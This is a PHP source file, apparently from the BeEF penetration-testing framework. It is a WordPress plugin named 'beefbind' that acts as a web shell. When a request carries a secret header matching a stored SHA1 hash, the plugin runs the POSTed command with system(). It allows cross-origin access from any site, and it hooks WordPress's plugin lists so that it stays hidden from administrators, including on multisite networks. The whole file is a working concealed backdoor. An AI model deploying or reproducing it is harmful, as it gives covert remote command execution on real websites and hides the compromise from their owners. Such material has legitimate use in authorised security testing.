CoCalc -- beefbind.php

GitHub Repository: beefproject/beef
Path: blob/master/modules/misc/wordpress/upload_rce_plugin/beefbind.php
¹¹⁵⁴ views

1
<?php
2
/**
3
 * Plugin Name: beefbind
4
 * Plugin URI: https://beefproject.com
5
 * Description: BeEF bind shell with CORS.
6
 * Version: 1.1
7
 * Authors: Bart Leppens, Erwan LR (@erwan_lr | WPScanTeam)
8
 * Author URI: https://twitter.com/bmantra
9
 * License: Copyright (c) 2006-2025Wade Alcorn - [email protected] - Browser Exploitation Framework (BeEF) - https://beefproject.com - See the file 'doc/COPYING' for copying permission
10
**/
11

12
header("Access-Control-Allow-Origin: *");
13

14
define('SHA1_HASH', '#SHA1HASH#');
15
define('BEEF_PLUGIN', 'beefbind/beefbind.php');
16

17
if (isset($_SERVER['HTTP_BEEF']) && strlen($_SERVER['HTTP_BEEF']) > 1) {
18
	if (strcasecmp(sha1($_SERVER['HTTP_BEEF']), SHA1_HASH) === 0) {
19
		if (isset($_POST['cmd']) && strlen($_POST['cmd']) > 0) {
20
			echo system($_POST['cmd']);
21
		}
22
	}
23
}
24

25
if (defined('WPINC')) {
26
	function hide_plugin() {
27
	    global $wp_list_table;
28
	    
29
	    foreach ($wp_list_table->items as $key => $val) {
30
	        if ($key == BEEF_PLUGIN) { unset($wp_list_table->items[$key]); }
31
	    }
32
	}
33
	add_action('pre_current_active_plugins', 'hide_plugin');
34

35
	// For Multisites
36
	function hide_plugin_from_network($plugins) {
37
	    if (in_array(BEEF_PLUGIN, array_keys($plugins))) { unset($plugins[BEEF_PLUGIN]); }
38

39
	    return $plugins;
40
	}
41
	add_filter('all_plugins', 'hide_plugin_from_network');
42
}
43
?>
44

Product

Resources

Company